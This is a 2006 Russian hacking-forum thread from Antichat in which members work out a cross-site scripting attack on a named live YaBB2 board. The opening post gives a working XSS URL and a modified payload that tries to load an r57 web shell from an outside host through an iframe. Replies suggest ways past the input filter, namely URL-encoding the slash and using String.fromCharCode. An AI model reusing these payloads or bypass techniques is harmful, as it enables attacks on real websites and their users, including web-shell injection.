ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS на Yabb2 Rc1
  #1  
Старый 10.12.2006, 17:25
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию XSS на Yabb2 Rc1

Первый раз такое, аж обидно!))но здаватся не собираюсь!

_http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%2 0SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>

вот КСС, подставляю вместо "javascript" src, прописую путь к 57шеллу на народе
PHP код:
http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Dhttp://XAK.narod.ru/r57shell.php><%252FIFRAME> 
, но вылезает эррор, типа :
Символ / не может использовацца в логине!Я уж и кодировал строку, и все равно никак!
Кто то может подскажет чтонить?
 
Ответить с цитированием

  #2  
Старый 10.12.2006, 18:30
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

/ > %2f
 
Ответить с цитированием

  #3  
Старый 10.12.2006, 19:31
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от $n@ke  
прописую путь к 57шеллу на народе
На народе нельзя, он php не поддерживает.
 
Ответить с цитированием

  #4  
Старый 10.12.2006, 21:55
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Цитата:
Сообщение от Ksander  
На народе нельзя, он php не поддерживает.
У него полюбому бы тогда код бы шелла высветелся, а народ, да пхп для него было бы шикарно!
 
Ответить с цитированием

  #5  
Старый 11.12.2006, 14:28
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

2 jah
Цитата:
Я уж и кодировал строку
нет, %2f не катит!Я ж грю.!
ну да, код бы должен был показацца!
 
Ответить с цитированием

  #6  
Старый 11.12.2006, 14:56
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию

$n@ke, попробуй через String.fromCharCode - может получится... Понять о чем это можно здесь https://forum.antichat.ru/thread15709.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Xss черви и вирусы: сообщества уязвимых Utochka Чужие Статьи 3 28.08.2006 00:26
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ